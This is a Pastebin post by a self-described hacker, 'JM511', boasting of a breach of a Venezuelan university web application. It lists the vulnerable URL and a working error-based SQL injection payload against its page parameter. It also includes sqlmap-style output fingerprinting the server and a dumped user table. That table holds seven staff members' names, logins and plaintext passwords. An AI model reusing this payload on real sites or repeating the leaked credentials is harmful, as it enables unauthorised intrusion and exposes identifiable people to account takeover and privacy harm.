Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- By @JM511
- Follow me: www.twitter.com/JM511
- We Are Saudi Arabian Hacker
- Don't Fuck With ME ;) Hackers From Venezuela ;)
- It's Cyber Warfare
- =========================
- Greeting to : All Muslims Hackers , In3ctor , Shi5-alHacker , Zombie_Hacker , Nok511 , Virus511 , ALM511 , M16
- =========================
- http://cip.una.edu.ve/index.php?page=JM511< SQL Injection
- Database: cip
- Table: usuarios
- [7 entries]
- +--------------+-----------+-------+---------------------+-----------+-------+
- | departamento | login | nivel | nombre | password | us_id |
- +--------------+-----------+-------+---------------------+-----------+-------+
- | CIIUNA | ymora | 1 | Yorgy Mora | ymora | 1 |
- | CIIUNA | ciiuna | 1 | Administrador | CiiUNAx9x | 43 |
- | CIP | nlopez | 1 | Norma Lopez | Nlopez975 | 44 |
- | CIP - Sec | wilmer | 1 | Wilmer Cede\f1o | wilmer | 45 |
- | CIP | licep | 1 | Licet Pachon | licep | 46 |
- | CIP | mcastillo | 1 | Maria Jose Castillo | m1234 | 48 |
- | CIIUNA | fcedeno | 1 | Franklyn Cede\f1o | fklyn | 49 |
- +--------------+-----------+-------+---------------------+-----------+-------+
- Database: cip
- [8 tables]
- +-------------+
- | contenido |
- | encuesta |
- | informacion |
- | menu |
- | noticias |
- | propiedades |
- | submenu |
- | usuarios |
- +-------------+
- Place: GET
- Parameter: page
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: page=1' AND (SELECT 6268 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,117,98,58),(SELECT (CASE WHEN (6268=6268) THEN 1 ELSE 0 END)),CHAR(58,118,109,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'EWGH'='EWGH
- ---
- [18:22:44] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
- web application technology: PHP 5.3.3, Apache 2.2.16
- back-end DBMS: MySQL 5.0
- [18:22:44] [INFO] fetching database names
- [18:22:44] [INFO] the SQL query used returns 2 entries
- [18:22:45] [INFO] retrieved: information_schema
- [18:22:47] [INFO] retrieved: cip
- available databases [2]:
- [*] cip
- [*] information_schema
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement